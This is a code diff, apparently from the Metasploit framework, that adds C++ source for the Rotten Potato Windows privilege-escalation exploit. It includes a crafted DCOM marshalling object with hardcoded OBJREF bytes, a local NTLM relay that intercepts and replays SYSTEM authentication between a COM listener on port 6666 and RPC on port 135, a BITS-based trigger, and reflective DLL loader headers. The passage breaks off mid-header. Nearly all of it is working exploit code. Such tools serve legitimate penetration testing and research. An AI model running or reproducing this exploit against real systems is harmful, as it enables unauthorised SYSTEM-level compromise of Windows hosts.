*pStm, const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags) { + byte data[] = { 0x4D, 0x45, 0x4F, 0x57, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x94, 0x09, 0x34, 0x76, + 0xC0, 0xF0, 0x15, 0xD8, 0x19, 0x8F, 0x4A, 0xA2, 0xCE, 0x05, 0x60, 0x86, 0xA3, 0x2A, 0x0F, 0x09, 0x24, 0xE8, 0x70, + 0x2A, 0x85, 0x65, 0x3B, 0x33, 0x97, 0xAA, 0x9C, 0xEC, 0x16, 0x00, 0x12, 0x00, 0x07, 0x00, 0x31, 0x00, 0x32, 0x00, + 0x37, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x31, 0x00, 0x5B, 0x00, 0x36, 0x00, 0x36, + 0x00, 0x36, 0x00, 0x36, 0x00, 0x5D, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00 }; + ULONG written = 0; + int szData = sizeof(data); + pStm->Write(&data, sizeof(data), &written); + return 0; +} +HRESULT IStorageTrigger::ReleaseMarshalData(IStream *pStm) { + return 0; +} +HRESULT IStorageTrigger::UnmarshalInterface(IStream *pStm, const IID &riid, void **ppv) { + *ppv = 0; + return 0; +} +HRESULT IStorageTrigger::Commit(DWORD grfCommitFlags) { + _stg->Commit(grfCommitFlags); + return 0; +} +HRESULT IStorageTrigger::CopyTo(DWORD ciidExclude, const IID *rgiidExclude, SNB snbExclude, IStorage *pstgDest) { + _stg->CopyTo(ciidExclude, rgiidExclude, snbExclude, pstgDest); + return 0; +} +HRESULT IStorageTrigger::CreateStorage(const OLECHAR *pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStorage **ppstg) { + _stg->CreateStorage(pwcsName, grfMode, reserved1, reserved2, ppstg); + return 0; +} +HRESULT IStorageTrigger::CreateStream(const OLECHAR *pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStream **ppstm) { + _stg->CreateStream(pwcsName, grfMode, reserved1, reserved2, ppstm); + return 0; +} +HRESULT IStorageTrigger::DestroyElement(const OLECHAR *pwcsName) { + _stg->DestroyElement(pwcsName); + return 0; +} +HRESULT IStorageTrigger::EnumElements(DWORD reserved1, void *reserved2, DWORD reserved3, IEnumSTATSTG **ppenum) { + _stg->EnumElements(reserved1, reserved2, reserved3, ppenum); + return 0; +} +HRESULT IStorageTrigger::MoveElementTo(const OLECHAR *pwcsName, IStorage *pstgDest, const OLECHAR *pwcsNewName, DWORD grfFlags) { + _stg->MoveElementTo(pwcsName, pstgDest, pwcsNewName, grfFlags); + return 0; +} +HRESULT IStorageTrigger::OpenStorage(const OLECHAR *pwcsName, IStorage *pstgPriority, DWORD grfMode, SNB snbExclude, DWORD reserved, IStorage **ppstg) { + _stg->OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved, ppstg); + return 0; +} +HRESULT IStorageTrigger::OpenStream(const OLECHAR *pwcsName, void *reserved1, DWORD grfMode, DWORD reserved2, IStream **ppstm) { + _stg->OpenStream(pwcsName, reserved1, grfMode, reserved2, ppstm); + return 0; +} +HRESULT IStorageTrigger::RenameElement(const OLECHAR *pwcsOldName, const OLECHAR *pwcsNewName) { + return 0; +} +HRESULT IStorageTrigger::Revert() { + return 0; +} +HRESULT IStorageTrigger::SetClass(const IID &clsid) { + return 0; +} +HRESULT IStorageTrigger::SetElementTimes(const OLECHAR *pwcsName, const FILETIME *pctime, const FILETIME *patime, const FILETIME *pmtime) { + return 0; +} +HRESULT IStorageTrigger::SetStateBits(DWORD grfStateBits, DWORD grfMask) { + return 0; +} +HRESULT IStorageTrigger::Stat(STATSTG *pstatstg, DWORD grfStatFlag) { + _stg->Stat(pstatstg, grfStatFlag); + + //Allocate from heap because apparently this will get freed in OLE32 + const wchar_t c_s[] = L"hello.stg"; + wchar_t *s = (wchar_t*)CoTaskMemAlloc(sizeof(c_s)); + wcscpy(s, c_s); + pstatstg[0].pwcsName = s; + return 0; +} + +///////////////////////IUknown Interface +HRESULT IStorageTrigger::QueryInterface(const IID &riid, void **ppvObj) { + // Always set out parameter to NULL, validating it first. + if (!ppvObj) + return E_INVALIDARG; + if (riid == IID_IUnknown) + { + *ppvObj = static_cast(this); + //reinterpret_cast(*ppvObj)->AddRef(); + } + else if (riid == IID_IStorage) + { + *ppvObj = static_cast(this); + } + else if (riid == IID_IMarshal) + { + *ppvObj = static_cast(this); + } + else + { + *ppvObj = NULL; + return E_NOINTERFACE; + } + // Increment the reference count and return the pointer. + + return S_OK; + +} + + +ULONG IStorageTrigger::AddRef() { + m_cRef++; + return m_cRef; +} + +ULONG IStorageTrigger::Release() { + // Decrement the object's internal counter. + ULONG ulRefCount = m_cRef--; + return ulRefCount; +} diff --git a/external/source/exploits/rottenpotato/IStorageTrigger.h b/external/source/exploits/rottenpotato/IStorageTrigger.h new file mode 100644 index 0000000000..bf38e5b1bf --- /dev/null +++ b/external/source/exploits/rottenpotato/IStorageTrigger.h @@ -0,0 +1,35 @@ +#pragma once +#include "Objidl.h" + +class IStorageTrigger : public IMarshal, public IStorage { +private: + IStorage *_stg; + int m_cRef; +public: + IStorageTrigger(IStorage *stg); + HRESULT STDMETHODCALLTYPE DisconnectObject(DWORD dwReserved); + HRESULT STDMETHODCALLTYPE GetMarshalSizeMax(const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags, DWORD *pSize); + HRESULT STDMETHODCALLTYPE GetUnmarshalClass(const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags, CLSID *pCid); + HRESULT STDMETHODCALLTYPE MarshalInterface(IStream *pStm, const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags); + HRESULT STDMETHODCALLTYPE ReleaseMarshalData(IStream *pStm); + HRESULT STDMETHODCALLTYPE UnmarshalInterface(IStream *pStm, const IID &riid, void **ppv); + HRESULT STDMETHODCALLTYPE Commit(DWORD grfCommitFlags); + HRESULT STDMETHODCALLTYPE CopyTo(DWORD ciidExclude, const IID *rgiidExclude, SNB snbExclude, IStorage *pstgDest); + HRESULT STDMETHODCALLTYPE CreateStorage(const OLECHAR *pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStorage **ppstg); + HRESULT STDMETHODCALLTYPE CreateStream(const OLECHAR *pwcsName, DWORD grfMode, DWORD reserved1, DWORD reserved2, IStream **ppstm); + HRESULT STDMETHODCALLTYPE DestroyElement(const OLECHAR *pwcsName); + HRESULT STDMETHODCALLTYPE EnumElements(DWORD reserved1, void *reserved2, DWORD reserved3, IEnumSTATSTG **ppenum); + HRESULT STDMETHODCALLTYPE MoveElementTo(const OLECHAR *pwcsName, IStorage *pstgDest, const OLECHAR *pwcsNewName, DWORD grfFlags); + HRESULT STDMETHODCALLTYPE OpenStorage(const OLECHAR *pwcsName, IStorage *pstgPriority, DWORD grfMode, SNB snbExclude, DWORD reserved, IStorage **ppstg); + HRESULT STDMETHODCALLTYPE OpenStream(const OLECHAR *pwcsName, void *reserved1, DWORD grfMode, DWORD reserved2, IStream **ppstm); + HRESULT STDMETHODCALLTYPE RenameElement(const OLECHAR *pwcsOldName, const OLECHAR *pwcsNewName); + HRESULT STDMETHODCALLTYPE Revert(); + HRESULT STDMETHODCALLTYPE SetClass(const IID &clsid); + HRESULT STDMETHODCALLTYPE SetElementTimes(const OLECHAR *pwcsName, const FILETIME *pctime, const FILETIME *patime, const FILETIME *pmtime); + HRESULT STDMETHODCALLTYPE SetStateBits(DWORD grfStateBits, DWORD grfMask); + HRESULT STDMETHODCALLTYPE Stat(STATSTG *pstatstg, DWORD grfStatFlag); + + HRESULT STDMETHODCALLTYPE QueryInterface(const IID &riid, void **ppvObject); + ULONG STDMETHODCALLTYPE AddRef(); + ULONG STDMETHODCALLTYPE Release(); +}; \ No newline at end of file diff --git a/external/source/exploits/rottenpotato/LocalNegotiator.cpp b/external/source/exploits/rottenpotato/LocalNegotiator.cpp new file mode 100644 index 0000000000..ef78d02e8e --- /dev/null +++ b/external/source/exploits/rottenpotato/LocalNegotiator.cpp @@ -0,0 +1,115 @@ +#include "stdafx.h" +#include "LocalNegotiator.h" +#include + +LocalNegotiator::LocalNegotiator() +{ + authResult = -1; +} + +void InitTokenContextBuffer(PSecBufferDesc pSecBufferDesc, PSecBuffer pSecBuffer) +{ + pSecBuffer->BufferType = SECBUFFER_TOKEN; + pSecBuffer->cbBuffer = 0; + pSecBuffer->pvBuffer = nullptr; + + pSecBufferDesc->ulVersion = SECBUFFER_VERSION; + pSecBufferDesc->cBuffers = 1; + pSecBufferDesc->pBuffers = pSecBuffer; +} + +int LocalNegotiator::handleType1(char * ntlmBytes, int len) +{ + TCHAR lpPackageName[1024] = L"Negotiate"; + TimeStamp ptsExpiry; + + int status = AcquireCredentialsHandle( + NULL, + lpPackageName, + SECPKG_CRED_INBOUND, + NULL, + NULL, + 0, + NULL, + &hCred, + &ptsExpiry); + + if (status != SEC_E_OK) + { + printf("Error in AquireCredentialsHandle"); + return -1; + } + + InitTokenContextBuffer(&secClientBufferDesc, &secClientBuffer); + InitTokenContextBuffer(&secServerBufferDesc, &secServerBuffer); + + phContext = new CtxtHandle(); + + secClientBuffer.cbBuffer = static_cast(len); + secClientBuffer.pvBuffer = ntlmBytes; + + ULONG fContextAttr; + TimeStamp tsContextExpiry; + + status = AcceptSecurityContext( + &hCred, + nullptr, + &secClientBufferDesc, + ASC_REQ_ALLOCATE_MEMORY | ASC_REQ_CONNECTION, + //STANDARD_CONTEXT_ATTRIBUTES, + SECURITY_NATIVE_DREP, + phContext, + &secServerBufferDesc, + &fContextAttr, + &tsContextExpiry); + + return status; +} + +int LocalNegotiator::handleType2(char * ntlmBytes, int len) +{ + char* newNtlmBytes = (char*) secServerBuffer.pvBuffer; + if (len >= secServerBuffer.cbBuffer) { + for (int i = 0; i < len; i++) + { + if (i < secServerBuffer.cbBuffer) { + ntlmBytes[i] = newNtlmBytes[i]; + } + else { + ntlmBytes[i] = 0x00; + } + } + } + else { + printf("Buffer sizes incompatible - can't replace"); + } + + return 0; +} + +int LocalNegotiator::handleType3(char * ntlmBytes, int len) +{ + InitTokenContextBuffer(&secClientBufferDesc, &secClientBuffer); + InitTokenContextBuffer(&secServerBufferDesc, &secServerBuffer); + + secClientBuffer.cbBuffer = static_cast(len); + secClientBuffer.pvBuffer = ntlmBytes; + + ULONG fContextAttr; + TimeStamp tsContextExpiry; + int status = AcceptSecurityContext( + &hCred, + phContext, + &secClientBufferDesc, + ASC_REQ_ALLOCATE_MEMORY | ASC_REQ_CONNECTION, + //STANDARD_CONTEXT_ATTRIBUTES, + SECURITY_NATIVE_DREP, + phContext, + &secServerBufferDesc, + &fContextAttr, + &tsContextExpiry); + + authResult = status; + + return status; +} diff --git a/external/source/exploits/rottenpotato/LocalNegotiator.h b/external/source/exploits/rottenpotato/LocalNegotiator.h new file mode 100644 index 0000000000..b1c8bf5e53 --- /dev/null +++ b/external/source/exploits/rottenpotato/LocalNegotiator.h @@ -0,0 +1,21 @@ +#define SECURITY_WIN32 + +#pragma once +#include +#include +class LocalNegotiator +{ +public: + LocalNegotiator(); + int handleType1(char* ntlmBytes, int len); + int handleType2(char* ntlmBytes, int len); + int handleType3(char* ntlmBytes, int len); + PCtxtHandle phContext; + int authResult; + +private: + CredHandle hCred; + SecBufferDesc secClientBufferDesc, secServerBufferDesc; + SecBuffer secClientBuffer, secServerBuffer; +}; + diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato.cpp new file mode 100644 index 0000000000..5ae698c51c --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato.cpp @@ -0,0 +1,374 @@ +#include "stdafx.h" +#include "MSFRottenPotato.h" +#include "IStorageTrigger.h" +#include +#include +#include +#include +#include +#pragma comment (lib, "Ws2_32.lib") +#pragma comment (lib, "Mswsock.lib") +#pragma comment (lib, "AdvApi32.lib") + +int CMSFRottenPotato::newConnection; + +// This is the constructor of a class that has been exported. +// see MSFRottenPotato.h for the class definition +CMSFRottenPotato::CMSFRottenPotato() +{ + comSendQ = new BlockingQueue(); + rpcSendQ = new BlockingQueue(); + newConnection = 0; + negotiator = new LocalNegotiator(); + return; +} + + +DWORD CMSFRottenPotato::startRPCConnectionThread() { + DWORD ThreadID; + CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)staticStartRPCConnection, (void*) this, 0, &ThreadID); + return ThreadID; +} + +DWORD CMSFRottenPotato::startCOMListenerThread() { + DWORD ThreadID; + CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)staticStartCOMListener, (void*) this, 0, &ThreadID); + return ThreadID; +} + +DWORD WINAPI CMSFRottenPotato::staticStartRPCConnection(void* Param) +{ + CMSFRottenPotato* This = (CMSFRottenPotato*)Param; + return This->startRPCConnection(); +} + +DWORD WINAPI CMSFRottenPotato::staticStartCOMListener(void* Param) +{ + CMSFRottenPotato* This = (CMSFRottenPotato*)Param; + return This->startCOMListener(); +} + +int CMSFRottenPotato::findNTLMBytes(char *bytes,int len) { + //Find the NTLM bytes in a packet and return the index to the start of the NTLMSSP header. + //The NTLM bytes (for our purposes) are always at the end of the packet, so when we find the header, + //we can just return the index + char pattern[7] = { 0x4E, 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50 }; + int pIdx = 0; + int i; + for (i = 0; i < len; i++) { + if (bytes[i] == pattern[pIdx]) { + pIdx = pIdx + 1; + if (pIdx == 7) return (i - 6); + } + else { + pIdx = 0; + } + } + return -1; +} + +int CMSFRottenPotato::processNtlmBytes(char *bytes, int len) { + int ntlmLoc = findNTLMBytes(bytes, len); + if (ntlmLoc == -1) return -1; + + int messageType = bytes[ntlmLoc + 8]; + switch (messageType) { + //NTLM type 1 message + case 1: + negotiator->handleType1(bytes + ntlmLoc, len - ntlmLoc); + break; + //NTLM type 2 message + case 2: + negotiator->handleType2(bytes + ntlmLoc, len - ntlmLoc); + break; + //NTLM type 3 message + case 3: + negotiator->handleType3(bytes + ntlmLoc, len - ntlmLoc); + break; + default: + return -1; + break; + } + return 0; +} + +int checkForNewConnection(SOCKET* ListenSocket, SOCKET* ClientSocket) { + fd_set readSet; + FD_ZERO(&readSet); + FD_SET(*ListenSocket, &readSet); + timeval timeout; + timeout.tv_sec = 1; // Zero timeout (poll) + timeout.tv_usec = 0; + if (select(*ListenSocket, &readSet, NULL, NULL, &timeout) == 1) { + *ClientSocket = accept(*ListenSocket, NULL, NULL); + return 1; + } + return 0; +} + +int CMSFRottenPotato::triggerDCOM(void) +{ + CoInitialize(nullptr); + + //Create IStorage object + IStorage *stg = NULL; + ILockBytes *lb = NULL; + CreateILockBytesOnHGlobal(NULL, true, &lb); + StgCreateDocfileOnILockBytes(lb, STGM_CREATE | STGM_READWRITE | STGM_SHARE_EXCLUSIVE, 0, &stg); + + //Initialze IStorageTrigger object + IStorageTrigger* t = new IStorageTrigger(stg); + + //Prep a few more args for CoGetInstanceFromIStorage + CLSID clsid; + //BITS IID + CLSIDFromString(OLESTR("{4991d34b-80a1-4291-83b6-3328366b9097}"), &clsid); + CLSID tmp; + //IUnknown IID + CLSIDFromString(OLESTR("{00000000-0000-0000-C000-000000000046}"), &tmp); + MULTI_QI qis[1]; + qis[0].pIID = &tmp; + qis[0].pItf = NULL; + qis[0].hr = 0; + + //Call CoGetInstanceFromIStorage + HRESULT status = CoGetInstanceFromIStorage(NULL, &clsid, NULL, CLSCTX_LOCAL_SERVER, t, 1, qis); + + return 0; +} + +int CMSFRottenPotato::startRPCConnection(void) { + const int DEFAULT_BUFLEN = 4096; + PCSTR DEFAULT_PORT = "135"; + PCSTR host = "127.0.0.1"; + + WSADATA wsaData; + SOCKET ConnectSocket = INVALID_SOCKET; + struct addrinfo *result = NULL, + *ptr = NULL, + hints; + + char *sendbuf; + char recvbuf[DEFAULT_BUFLEN]; + int iResult; + int recvbuflen = DEFAULT_BUFLEN; + + // Initialize Winsock + iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); + if (iResult != 0) { + return 1; + } + + ZeroMemory(&hints, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + hints.ai_protocol = IPPROTO_TCP; + + // Resolve the server address and port + iResult = getaddrinfo(host, DEFAULT_PORT, &hints, &result); + if (iResult != 0) { + WSACleanup(); + return 1; + } + + // Attempt to connect to an address until one succeeds + for (ptr = result; ptr != NULL; ptr = ptr->ai_next) { + + // Create a SOCKET for connecting to server + ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, + ptr->ai_protocol); + if (ConnectSocket == INVALID_SOCKET) { + WSACleanup(); + return 1; + } + + // Connect to server. + iResult = connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); + if (iResult == SOCKET_ERROR) { + closesocket(ConnectSocket); + ConnectSocket = INVALID_SOCKET; + continue; + } + break; + } + + if (ConnectSocket == INVALID_SOCKET) { + WSACleanup(); + return 1; + } + + // Send/Receive until the peer closes the connection + do { + + //Monitor our sendQ until we have some data to send + int *len = (int*)rpcSendQ->wait_pop(); + sendbuf = rpcSendQ->wait_pop(); + + //Check if we should be opening a new socket before we send the data + if (newConnection == 1) { + //closesocket(ConnectSocket); + ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype,ptr->ai_protocol); + connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); + newConnection = 0; + } + + iResult = send(ConnectSocket, sendbuf, *len, 0); + if (iResult == SOCKET_ERROR) { + closesocket(ConnectSocket); + WSACleanup(); + return 1; + } + + iResult = recv(ConnectSocket, recvbuf, recvbuflen, 0); + if (iResult > 0) { + comSendQ->push((char*)&iResult); + comSendQ->push(recvbuf); + } + else if (iResult == 0) + printf("RPC-> Connection closed\n"); + else + printf("RPC -> recv failed with error: %d\n", WSAGetLastError()); + + } while (iResult > 0); + + // cleanup + iResult = shutdown(ConnectSocket, SD_SEND); + closesocket(ConnectSocket); + WSACleanup(); + + return 0; +} + +int CMSFRottenPotato::startCOMListener(void) { + const int DEFAULT_BUFLEN = 4096; + PCSTR DEFAULT_PORT = "6666"; + + WSADATA wsaData; + int iResult; + + SOCKET ListenSocket = INVALID_SOCKET; + SOCKET ClientSocket = INVALID_SOCKET; + + struct addrinfo *result = NULL; + struct addrinfo hints; + + int iSendResult; + char *sendbuf; + + char recvbuf[DEFAULT_BUFLEN]; + int recvbuflen = DEFAULT_BUFLEN; + + // Initialize Winsock + iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); + if (iResult != 0) { + return 1; + } + + ZeroMemory(&hints, sizeof(hints)); + hints.ai_family = AF_INET; + hints.ai_socktype = SOCK_STREAM; + hints.ai_protocol = IPPROTO_TCP; + hints.ai_flags = AI_PASSIVE; + + // Resolve the server address and port + iResult = getaddrinfo(NULL, DEFAULT_PORT, &hints, &result); + if (iResult != 0) { + WSACleanup(); + return 1; + } + + // Create a SOCKET for connecting to server + ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol); + if (ListenSocket == INVALID_SOCKET) { + freeaddrinfo(result); + WSACleanup(); + return 1; + } + + // Setup the TCP listening socket + iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen); + if (iResult == SOCKET_ERROR) { + freeaddrinfo(result); + closesocket(ListenSocket); + WSACleanup(); + return 1; + } + + freeaddrinfo(result); + + iResult = listen(ListenSocket, SOMAXCONN); + if (iResult == SOCKET_ERROR) { + closesocket(ListenSocket); + WSACleanup(); + return 1; + } + + // Accept a client socket + ClientSocket = accept(ListenSocket, NULL, NULL); + if (ClientSocket == INVALID_SOCKET) { + closesocket(ListenSocket); + WSACleanup(); + return 1; + } + + // Receive until the peer shuts down the connection + int ntlmLoc; + do { + iResult = recv(ClientSocket, recvbuf, recvbuflen, 0); + if (iResult > 0) { + + //check to see if the received packet has NTLM auth information + processNtlmBytes(recvbuf, iResult); + + //Send all incoming packets to the WinRPC sockets "send queue" and wait for the WinRPC socket to put a packet into our "send queue" + //put packet in winrpc_sendq + rpcSendQ->push((char*)&iResult); + rpcSendQ->push(recvbuf); + + //block and wait for a new item in our sendq + int* len = (int*)comSendQ->wait_pop(); + sendbuf = comSendQ->wait_pop(); + + //Check to see if this is a packet containing NTLM authentication information before sending + processNtlmBytes(sendbuf, *len); + + //send the new packet sendbuf + iSendResult = send(ClientSocket, sendbuf, *len, 0); + + if (iSendResult == SOCKET_ERROR) { + closesocket(ClientSocket); + WSACleanup(); + return 1; + } + + //Sometimes Windows likes to open a new connection instead of using the current one + //Allow for this by waiting for 1s and replacing the ClientSocket if a new connection is incoming + newConnection = checkForNewConnection(&ListenSocket, &ClientSocket); + } + else if (iResult == 0) + printf("Connection closing...\n"); + else { + closesocket(ClientSocket); + WSACleanup(); + return 1; + } + + } while (iResult > 0); + + // shutdown the connection since we're done + iResult = shutdown(ClientSocket, SD_SEND); + if (iResult == SOCKET_ERROR) { + closesocket(ClientSocket); + WSACleanup(); + return 1; + } + + // cleanup + closesocket(ClientSocket); + WSACleanup(); + + closesocket(ListenSocket); + WSACleanup(); + + return 0; +} diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato.h b/external/source/exploits/rottenpotato/MSFRottenPotato.h new file mode 100644 index 0000000000..605081a474 --- /dev/null +++ b/external/source/exploits/rottenpotato/MSFRottenPotato.h @@ -0,0 +1,35 @@ +// The following ifdef block is the standard way of creating macros which make exporting +// from a DLL simpler. All files within this DLL are compiled with the MSFROTTENPOTATO_EXPORTS +// symbol defined on the command line. This symbol should not be defined on any project +// that uses this DLL. This way any other project whose source files include this file see +// MSFROTTENPOTATO_API functions as being imported from a DLL, whereas this DLL sees symbols +// defined with this macro as being exported. +#ifdef MSFROTTENPOTATO_EXPORTS +#define MSFROTTENPOTATO_API __declspec(dllexport) +#else +#define MSFROTTENPOTATO_API __declspec(dllimport) +#endif +#include "Objidl.h" +#include "BlockingQueue.h" +#include "LocalNegotiator.h" + +// This class is exported from the MSFRottenPotato.dll +class MSFROTTENPOTATO_API CMSFRottenPotato { +private: + BlockingQueue* comSendQ; + BlockingQueue* rpcSendQ; + static DWORD WINAPI staticStartRPCConnection(void * Param); + static DWORD WINAPI staticStartCOMListener(void * Param); + static int newConnection; + int processNtlmBytes(char* bytes, int len); + int findNTLMBytes(char * bytes, int len); + +public: + CMSFRottenPotato(void); + int startRPCConnection(void); + DWORD startRPCConnectionThread(); + DWORD startCOMListenerThread(); + int startCOMListener(void); + int triggerDCOM(); + LocalNegotiator *negotiator; +}; diff --git a/external/source/exploits/rottenpotato/ReflectiveDllInjection.h b/external/source/exploits/rottenpotato/ReflectiveDllInjection.h new file mode 100644 index 0000000000..ac54beb26a --- /dev/null +++ b/external/source/exploits/rottenpotato/ReflectiveDllInjection.h @@ -0,0 +1,51 @@ +//===============================================================================================// +// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted +// provided that the following conditions are met: +// +// * Redistributions of source code must retain the above copyright notice, this list of +// conditions and the following disclaimer. +// +// * Redistributions in binary form must reproduce the above copyright notice, this list of +// conditions and the following disclaimer in the documentation and/or other materials provided +// with the distribution. +// +// * Neither the name of Harmony Security nor the names of its contributors may be used to +// endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR +// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND +// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +// POSSIBILITY OF SUCH DAMAGE. +//===============================================================================================// +#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H +#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H +//===============================================================================================// +#define WIN32_LEAN_AND_MEAN +#include + +// we declare some common stuff in here... + +#define DLL_QUERY_HMODULE 6 + +#define DEREF( name )*(UINT_PTR *)(name) +#define DEREF_64( name )*(DWORD64 *)(name) +#define DEREF_32( name )*(DWORD *)(name) +#define DEREF_16( name )*(WORD *)(name) +#define DEREF_8( name )*(BYTE *)(name) + +typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID); +typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); + +#define DLLEXPORT __declspec( dllexport ) + +//===============================================================================================// +#endif +//===============================================================================================// diff --git a/external/source/exploits/rottenpotato/ReflectiveLoader.h b/external/source/exploits/rottenpotato/ReflectiveLoader.h new file mode 100644 index 0000000000..efe9962387 --- /dev/null +++ b/external/source/exploits/rottenpotato/ReflectiveLoader.h @@ -0,0 +1,223 @@ +//===============================================================================================// +// Copyright (c) 2013, Stephen Fewer of Harmony Security (www.harmonysecurity.com) +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without modification, are permitted +// provided that the following conditions are met: +// +// * Redistributions of source code must retain the above copyright notice, this list of +// conditions and the following disclaimer. +// +// * Redistributions in binary form must reproduce the above copyright notice, this list of +// conditions and the following disclaimer in the documentation and/or other materials provided +// with the distribution. +// +// * Neither the name of Harmony Security nor the names of its contributors may be used to +// endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR +// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND +// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +// POSSIBILITY OF SUCH DAMAGE. +//===============================================================================================// +#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H +#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H +//===============================================================================================// +#define WIN32_LEAN_AND_MEAN +#include +#include +#include + +#include "ReflectiveDLLInjection.h" + +// Enable this define to turn on OutputDebugString support +//#define ENABLE_OUTPUTDEBUGSTRING 1 + +// Enable this define to turn on locking of memory to prevent paging +#define ENABLE_STOPPAGING 1 + +#define EXITFUNC_SEH 0xEA320EFE +#define EXITFUNC_THREAD 0x0A2A1DE0 +#define EXITFUNC_PROCESS 0x56A2B5F0 + +typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR); +typedef FARPROC(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR); +typedef LPVOID(WINAPI * VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD); +typedef DWORD(NTAPI * NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG); + +#define KERNEL32DLL_HASH 0x6A4ABC5B +#define NTDLLDLL_HASH 0x3CFA685D + +#define LOADLIBRARYA_HASH 0xEC0E4E8E +#define GETPROCADDRESS_HASH 0x7C0DFCAA +#define VIRTUALALLOC_HASH 0x91AFCA54 +#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 + +#ifdef ENABLE_STOPPAGING +typedef LPVOID(WINAPI * VIRTUALLOCK)(LPVOID, SIZE_T); +#define VIRTUALLOCK_HASH 0x0EF632F2 +#endif + +#ifdef ENABLE_OUTPUTDEBUGSTRING +typedef LPVOID(WINAPI * OUTPUTDEBUG)(LPCSTR); +#define OUTPUTDEBUG_HASH 0x470D22BC +#endif + +#define IMAGE_REL_BASED_ARM_MOV32A 5 +#define IMAGE_REL_BASED_ARM_MOV32T 7 + +#define ARM_MOV_MASK (DWORD)(0xFBF08000) +#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) +#define ARM_MOVW 0xF2400000 +#define ARM_MOVT 0xF2C00000 + +#define HASH_KEY 13 +//===============================================================================================// +#pragma intrinsic( _rotr ) + +__forceinline DWORD ror(DWORD d) +{ + return _rotr(d, HASH_KEY); +} + +__forceinline DWORD _hash(char * c) +{ + register DWORD h = 0; + do + { + h = ror(h); + h += *c; + } while (*++c); + + return h; +} +//===============================================================================================// +typedef struct 